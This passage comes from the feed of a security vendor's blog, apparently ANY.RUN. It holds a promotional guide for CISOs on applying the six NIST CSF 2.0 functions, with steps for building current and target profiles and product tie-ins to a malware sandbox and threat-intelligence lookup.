<p>The post <a href="https://any.run/cybersecurity-blog/usa-top-30-threats-2026/">US Threat Landscape Alert: 30 Active Malware Families Ranked by Real Sandbox Data</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/usa-top-30-threats-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>NIST CSF 2.0 Practical Guide: Building a Modern Security Program for Risk Management in the US Companies</title>
		<link>https://any.run/cybersecurity-blog/nist-csf-guide-for-cisos/</link>
					<comments>https://any.run/cybersecurity-blog/nist-csf-guide-for-cisos/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 08 Jul 2026 11:14:07 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=21958</guid>

					<description><![CDATA[<p>Cybersecurity programs often grow over time&#160;through new policies, controls, and technologies. The challenge for CISOs is making sure these pieces work together and support the risks that matter most to the business.&#160; NIST CSF 2.0 provides a practical structure for doing that. It helps US organizations understand their current security posture, define clear priorities, and [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/nist-csf-guide-for-cisos/">NIST CSF 2.0 Practical Guide: Building a Modern Security Program for Risk Management in the US Companies</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Cybersecurity programs often grow over time&nbsp;through new policies, controls, and technologies. The challenge for CISOs is making sure these pieces work together and support the risks that matter most to the business.&nbsp;</p>



<p class="wp-block-paragraph">NIST CSF 2.0 provides a practical structure for doing that. It helps US organizations understand their current security posture, define clear priorities, and improve how they govern, identify, protect, detect, respond to, and recover from cyber incidents. </p>



<p class="wp-block-paragraph">This guide explains how CISOs can apply the updated framework in practice and where ANY.RUN’s&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat&nbsp;Intelligence</a>&nbsp;solutions can contribute to stronger&nbsp;threat&nbsp;analysis,&nbsp;fastervalidation, and more informed&nbsp;response decisions.&nbsp;</p>



<h2 class="wp-block-heading">What Is NIST CSF 2.0?&nbsp;</h2>



<p class="wp-block-paragraph"><a href="https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.29.pdf" target="_blank" rel="noreferrer noopener">NIST Cybersecurity Framework 2.0</a> is a flexible set of guidelines that helps US organizations manage and reduce cybersecurity risk. </p>



<p class="wp-block-paragraph">Rather than prescribing specific technologies or controls, it provides a common structure for understanding the current security posture,&nbsp;identifying&nbsp;gaps, setting priorities, and improving how cybersecurity decisions are made.&nbsp;</p>



<h2 class="wp-block-heading">What Changed in NIST CSF 2.0?&nbsp;</h2>



<p class="wp-block-paragraph">The biggest change in NIST CSF 2.0 is the addition of&nbsp;Govern&nbsp;as a sixth core function, alongside Identify, Protect, Detect,&nbsp;Respond, and Recover.&nbsp;</p>



<p class="wp-block-paragraph">This change reflects a broader view of cybersecurity. It is no longer treated only as a technical issue for security teams. CSF 2.0 places greater emphasis on leadership, business priorities, risk ownership, regulatory requirements, and third-party relationships.&nbsp;</p>



<p class="wp-block-paragraph">The Govern function covers six key areas:&nbsp;</p>



<ul class="wp-block-list">
<li>Organizational context&nbsp;</li>



<li>Risk management strategy&nbsp;</li>



<li>Roles,&nbsp;responsibilities, and authority&nbsp;</li>



<li>Cybersecurity policies&nbsp;</li>



<li>Review of security performance&nbsp;</li>



<li>Cybersecurity supply chain risk management&nbsp;</li>
</ul>



<p class="wp-block-paragraph">In practice, this means CISOs are expected to connect security decisions with the organization’s mission, risk appetite, legal obligations, and business dependencies. It also places clearer&nbsp;responsibility on leadership to provide the right&nbsp;resources, review performance, and adjust the security strategy when risks change.&nbsp;</p>



<p class="wp-block-paragraph">Another important update is the stronger focus on suppliers and third parties. US companies are expected to understand which suppliers are critical, assess the risks they introduce, include them in incident planning, and manage those risks throughout the relationship. </p>



<p class="wp-block-paragraph">CSF 2.0 is also designed for a wider audience. While the original framework was&nbsp;closely associated&nbsp;with critical infrastructure, the updated version is intended for organizations of any size, sector, or level of security maturity.&nbsp;</p>



<p class="wp-block-paragraph">The six functions are now:&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-340"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="7"
           data-wpID="340"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        CSF 2.0 function                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        What it helps the organization do                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Govern                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Set risk priorities, assign responsibility, establish policies, and review performance                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Identify                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Understand assets, suppliers, threats, vulnerabilities, and current risk                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Protect                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Put safeguards in place to reduce the likelihood and impact of incidents                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Detect                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Find and analyze signs of possible attacks or compromise                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Respond                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Validate, investigate, contain, and communicate incidents                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Recover                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Restore affected operations and coordinate recovery activities                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-340'>
table#wpdtSimpleTable-340{ table-layout: fixed !important; }
table#wpdtSimpleTable-340 td, table.wpdtSimpleTable340 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">These functions are not six steps that happen one after another. They work together as part of an ongoing cycle. Governance shapes the whole program, while findings from detection,&nbsp;response, and recovery should feed back into risk assessments, policies, and future security priorities.&nbsp;&nbsp;</p>



<h2 class="wp-block-heading">NIST CSF 2.0 Requirements: What CISOs Need to Know&nbsp;</h2>



<p class="wp-block-paragraph">NIST CSF 2.0 does not prescribe a fixed list of technologies or controls that every organization must implement. Instead, it defines cybersecurity outcomes that organizations can adapt to their size, risk profile, regulatory obligations, and business priorities.&nbsp;</p>



<p class="wp-block-paragraph">Its requirements may become more specific when the framework is used alongside US federal or state regulations, industry standards, contracts, or internal policies. CISOs should therefore use CSF 2.0 to organize security activities while considering the legal, regulatory, and contractual requirements that apply to their organization.</p>



<p class="wp-block-paragraph">In practice, implementation means deciding which outcomes are relevant, assessing how well they are currently achieved, assigning&nbsp;responsibility, and creating a plan to address the most important gaps.&nbsp;</p>



<h2 class="wp-block-heading">How to Start NIST Cybersecurity Framework 2.0 Implementation&nbsp;</h2>



<p class="wp-block-paragraph">Implementing CSF 2.0 does not mean rebuilding the entire security program. Most US organizations already have many of the required controls and processes in place. The first step is to understand where the current program falls short and which gaps create the most risk. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="350" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-1024x350.png" alt="Where to start with NIST CSF 2.0" class="wp-image-21959" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-1024x350.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-300x103.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-768x263.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-1536x525.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-2048x700.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-370x127.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-270x92.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-2-2-740x253.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Where to start with NIST CSF 2.0</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">A practical approach is to focus on one critical area, such as phishing&nbsp;response, cloud security, supplier file intake, or incident handling, and move&nbsp;through four steps.&nbsp;</p>



<h3 class="wp-block-heading">1. Define the Scope&nbsp;</h3>



<p class="wp-block-paragraph">Choose the business service, environment, or risk scenario the assessment will cover. A clear scope keeps the project manageable and connects security outcomes with specific assets, teams, and business operations.&nbsp;</p>



<h3 class="wp-block-heading">2. Build a Current Profile&nbsp;</h3>



<p class="wp-block-paragraph">Document how the organization manages the selected risk today, including:&nbsp;</p>



<ul class="wp-block-list">
<li>Existing controls and processes&nbsp;</li>



<li>Responsible teams&nbsp;</li>



<li>Available evidence and metrics</li>



<li>Known weaknesses&nbsp;&nbsp;</li>



<li>Supplier or service-provider dependencies&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The goal is to capture what happens in practice, not only what internal policies describe.&nbsp;</p>



<h3 class="wp-block-heading">3. Define the Target Profile&nbsp;</h3>



<p class="wp-block-paragraph">The Target Profile describes the security outcomes the organization needs to achieve.&nbsp;</p>



<p class="wp-block-paragraph">Rather than using broad goals such as “improve&nbsp;threat&nbsp;detection,” define specific outcomes. For example:&nbsp;</p>



<ul class="wp-block-list">
<li>Suspicious files, URLs, and emails are&nbsp;analyzed&nbsp;safely.&nbsp;</li>



<li>Analysts receive enough evidence to&nbsp;validate&nbsp;alerts.&nbsp;</li>



<li>Threat&nbsp;intelligence is available inside existing SOC workflows.&nbsp;</li>



<li>Investigations produce consistent IOCs, TTPs, and reports.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">This is where CISOs can connect CSF outcomes with the capabilities needed to achieve them. For example, ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> solutions can help close gaps in behavioral analysis, threat validation, and investigation context.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Close visibility gaps that delay investigations and increase exposure.</span><br>
Give your SOC the evidence to act faster.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=nist-csf-guide-for-cisos&#038;utm_term=080726&#038;utm_content=linktoenterprise/#contact-sales" rel="noopener" target="_blank">
Reduce Security Exposure</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">4. Prioritize the Most Important Gaps&nbsp;</h3>



<p class="wp-block-paragraph">Compare the Current and Target Profiles, then rank the gaps based on business impact, likelihood, regulatory requirements, implementation effort, and exposure of critical assets.&nbsp;</p>



<p class="wp-block-paragraph">This creates a practical improvement roadmap. It shows where the organization stands, which capabilities are missing, and which investments or process changes should come first.&nbsp;</p>



<h2 class="wp-block-heading">NIST CSF 2.0 Best Practices for CISOs&nbsp;</h2>



<p class="wp-block-paragraph">A successful implementation should reflect the organization’s real risks and operating environment rather than become a checklist exercise.&nbsp;</p>



<p class="wp-block-paragraph">Several best practices can make the framework more useful:&nbsp;</p>



<ul class="wp-block-list">
<li>Start with a critical business service or risk scenario instead of assessing everything at once.&nbsp;</li>



<li>Connect each cybersecurity outcome with a clear owner and business reason.&nbsp;</li>



<li>Use evidence from incidents, investigations, exercises, and&nbsp;threat&nbsp;intelligence to&nbsp;identify&nbsp;gaps.</li>



<li>Prioritize improvements based on risk and impact, not only technical severity.&nbsp;&nbsp;</li>



<li>Review Current and Target Profiles as&nbsp;threats, technologies, and business priorities change.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The framework should remain part of an ongoing risk management process. Each investigation, incident, or major change should provide&nbsp;new information&nbsp;that helps the organization adjust its priorities and strengthen the program.&nbsp;</p>



<h2 class="wp-block-heading">Applying NIST CSF 2.0 in Practice&nbsp;</h2>



<p class="wp-block-paragraph">Once the Current and Target Profiles are clear, CISOs can begin mapping priorities to the six CSF functions. The goal is not to treat them as separate projects, but to build a connected program where governance, prevention, detection,&nbsp;response, and recovery support each other.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="613" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-1024x613.png" alt="NIST CSF 2.0 functions" class="wp-image-21960" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-1024x613.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-300x180.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-768x460.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-1536x920.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-2048x1227.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-370x222.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-270x162.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/NIST-CSF-20-Core-Functions-at-a-Glance-3-740x443.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>NIST CSF 2.0 functions</em></figcaption></figure>
</div>


<h3 class="wp-block-heading">Govern:&nbsp;Set the Direction for the Security Program&nbsp;</h3>



<p class="wp-block-paragraph">The NIST CSF 2.0 Govern function defines how cybersecurity risk is managed across the organization. It connects security priorities with business goals, legal obligations, leadership decisions, and supplier relationships.&nbsp;</p>



<p class="wp-block-paragraph">For CISOs, this means deciding:&nbsp;</p>



<ul class="wp-block-list">
<li>Who owns each risk&nbsp;</li>



<li>How risks are prioritized&nbsp;</li>



<li>Which policies guide security decisions</li>



<li>How performance is reviewed&nbsp;&nbsp;</li>



<li>Where resources and investment are needed&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Evidence from investigations can make these decisions more grounded. Threat trends, recurring visibility gaps, and analysis activity can reveal where processes are slowing down or where teams lack the capabilities needed to manage risk effectively.&nbsp;</p>



<p class="wp-block-paragraph">In this context, ANY.RUN gives leaders operational information they can use when reviewing policies, investment priorities, and the overall performance of the security program.&nbsp;</p>



<h3 class="wp-block-heading">Identify: Understand Current Risk and&nbsp;Threat&nbsp;Exposure&nbsp;</h3>



<p class="wp-block-paragraph">The NIST CSF 2.0 Identify function helps US organizations understand the risks affecting critical assets, services, suppliers, and business operations. </p>



<p class="wp-block-paragraph">Threat intelligence plays&nbsp;an important role&nbsp;here. ANY.RUN&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>&nbsp;is built on real investigation data from more than 15,000 organizations across different industries. It gives teams visibility into active malware, phishing campaigns, malicious infrastructure, and attacker&nbsp;behavior&nbsp;seen in real-world investigations.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="383" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-1024x383.webp" alt="" class="wp-image-21831" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-1024x383.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-300x112.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-768x287.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-370x138.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-270x101.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-740x277.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg.webp 1252w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup displaying targeting locations, industries, related analysis sessions and more</em></figcaption></figure>



<p class="wp-block-paragraph">This allows organizations to:&nbsp;</p>



<ul class="wp-block-list">
<li>Identify&nbsp;threats relevant to their industry and environment&nbsp;</li>



<li>Add current threat context to risk assessments&nbsp;</li>



<li>Understand how active campaigns operate&nbsp;</li>



<li>Prioritize gaps based on real attacker activity&nbsp;</li>



<li>Improve security plans using operational evidence&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The value is not in collecting more indicators. It is in understanding which threats are most relevant to the business and where existing&nbsp;defenses&nbsp;may fall short.&nbsp;</p>



<h3 class="wp-block-heading">Protect: Strengthen Safeguards Before an Incident&nbsp;</h3>



<p class="wp-block-paragraph">The NIST CSF 2.0 Protect function covers the controls that reduce the likelihood of an attack succeeding or limit the damage it can cause. This includes access management, employee training, data protection, secure configurations, and infrastructure resilience.&nbsp;</p>



<p class="wp-block-paragraph">For CISOs, the key question is whether these safeguards reflect the organization’s actual risk and threat exposure.&nbsp;</p>



<p class="wp-block-paragraph">Findings from malware and phishing investigations can help teams see how attackers bypass filters, abuse legitimate applications, or execute unauthorized software. That evidence can then be used to improve:&nbsp;</p>



<ul class="wp-block-list">
<li>Blocking and detection logic&nbsp;</li>



<li>Security procedures&nbsp;</li>



<li>Training for analysts and specialized teams&nbsp;</li>



<li>Controls around external files and links&nbsp;</li>



<li>Defenses&nbsp;against unauthorized software execution&nbsp;</li>
</ul>



<p class="wp-block-paragraph">This creates a feedback loop where lessons from real threats strengthen preventive controls.&nbsp;</p>



<h3 class="wp-block-heading">Detect: Turn Suspicious Activity into Clear Evidence&nbsp;</h3>



<p class="wp-block-paragraph">The NIST CSF 2.0 Detect function focuses on finding signs of compromise and&nbsp;determining&nbsp;whether they&nbsp;represent&nbsp;a real incident.&nbsp;</p>



<p class="wp-block-paragraph">SIEM, EDR, email security, and network monitoring systems may generate the initial alert. The challenge is understanding what the suspicious activity actually does and whether it meets the organization’s incident criteria.</p>



<p class="wp-block-paragraph">Through the&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>, analysts can safely examine files, URLs, and emails and&nbsp;observe&nbsp;their runtime&nbsp;behavior. Threat Intelligence Lookup adds context around related indicators, infrastructure, and known attacker activity.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="570" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-1024x570.webp" alt="" class="wp-image-21830" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-1024x570.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-300x167.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-768x427.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-1536x854.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-370x206.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-270x150.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-740x412.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png.webp 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full attack chain of the attack analyzed inside ANY.RUN sandbox</em></figcaption></figure>



<p class="wp-block-paragraph">Together, these capabilities help teams:&nbsp;</p>



<ul class="wp-block-list">
<li>Validate suspicious activity faster&nbsp;</li>



<li>Understand malicious&nbsp;behavior&nbsp;and infrastructure&nbsp;</li>



<li>Correlate findings from multiple sources&nbsp;</li>



<li>Estimate potential impact and scope&nbsp;</li>



<li>Escalate confirmed threats with supporting evidence&nbsp;</li>
</ul>



<p class="wp-block-paragraph">This turns an isolated alert into a clearer, evidence-based detection decision.&nbsp;</p>



<h3 class="wp-block-heading">Respond: Move From Validation to Action&nbsp;</h3>



<p class="wp-block-paragraph">The NIST CSF 2.0 Respond function begins once suspicious activity has been confirmed as an incident. Teams must prioritize the case, understand what happened, estimate its scale, and coordinate the next steps.&nbsp;</p>



<p class="wp-block-paragraph">Investigation results from ANY.RUN provide the technical evidence needed for these decisions. Analysts can extract IOCs, document&nbsp;behaviors&nbsp;and TTPs,&nbsp;identify&nbsp;related infrastructure, and share findings with the teams responsible for containment.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="685" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report-1024x685.png" alt="Tier 1 report with relevant IOCs, TTPs, AI summary, recommendations and more for faster triage and response" class="wp-image-21964" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report-1024x685.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report-300x201.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report-768x514.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report-370x248.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report-270x181.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report-740x495.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/tier_1_report.png 1376w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Tier 1 report with relevant IOCs, TTPs, AI summary, recommendations and more for faster triage and response</em></figcaption></figure>



<p class="wp-block-paragraph">The results can support:&nbsp;</p>



<ul class="wp-block-list">
<li>Incident triage and prioritization&nbsp;</li>



<li>Root-cause analysis&nbsp;</li>



<li>Escalation with&nbsp;clear evidence&nbsp;</li>



<li>Threat hunting across the environment&nbsp;</li>



<li>Containment and eradication decisions&nbsp;</li>



<li>Coordination between SOC teams and other stakeholders&nbsp;</li>
</ul>



<p class="wp-block-paragraph">Containment still takes place through endpoint, identity, network, and other response systems. The role of ANY.RUN is to give responders the context they need to choose the right action without unnecessary delay.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce delays between threat confirmation and containment.  </span><br>
Give responders the evidence to act faster. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=nist-csf-guide-for-cisos&amp;utm_term=080726&amp;utm_content=linktoenterprise/#contact-sales" rel="noopener" target="_blank">
Accelerate Incident Response</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Recover:&nbsp;Restore Operations and Learn&nbsp;from&nbsp;the Incident&nbsp;</h3>



<p class="wp-block-paragraph">The NIST CSF 2.0 Recover function focuses on restoring affected systems and services, verifying that they are safe to return to use, and keeping stakeholders informed.&nbsp;</p>



<p class="wp-block-paragraph">For CISOs, this means having clear recovery criteria, prioritizing critical operations, verifying backups and restored assets, and documenting when normal operations can resume.&nbsp;</p>



<p class="wp-block-paragraph">Investigation records can help recovery teams understand which files, systems, accounts, or persistence mechanisms require further checks. They can also support post-incident reviews by showing where visibility, escalation, or response processes broke down.&nbsp;</p>



<p class="wp-block-paragraph">These lessons should then feed back into the Identify function, where NIST places continuous improvement. Detection rules, response playbooks, investigation procedures, and future risk priorities can all be updated based on what the organization learned.&nbsp;</p>



<h2 class="wp-block-heading">Integrating ANY.RUN into NIST CSF 2.0 Implementation&nbsp;</h2>



